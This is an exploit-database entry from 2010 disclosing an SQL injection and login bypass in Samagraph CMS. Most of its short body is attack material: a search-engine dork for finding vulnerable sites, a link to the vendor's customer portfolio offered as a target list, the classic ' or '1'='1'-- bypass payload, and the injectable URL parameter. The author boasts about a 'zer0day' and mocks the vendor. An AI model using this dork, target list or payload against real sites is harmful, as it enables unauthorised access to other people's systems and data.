Samagraph CMS SQL Injection / Authentication Bypass Vulnerability

2010-03-12T00:00:00
ID 1337DAY-ID-11278
Type zdt
Reporter K053
Modified 2010-03-12T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =================================================================
Samagraph CMS SQL Injection / Authentication Bypass Vulnerability
=================================================================

# Title : Sql injection in samagraph product
# Date : 11-03-2010
# Author : K053 
# Vendor : http://www.samagraph.com/
____________________________________________________________________________________________
Cms is fully vulnerable, but just enjoy this zer0day flaw :)) 
-------------------------------------------------------------

Dork : inurl:"fa/inside.aspx?g="
list : http://www.samagraph.com/N2/portfolio.htm
login bypass : ' or '1'='1'--
Vuln : http://blahblah/inside.aspx?g=[sqli]


____________________________________________________________________________________________
>> we hate disclosing but sometimes fool vendor make us !!
____________________________________________________________________________________________




#  0day.today [2018-01-10]  #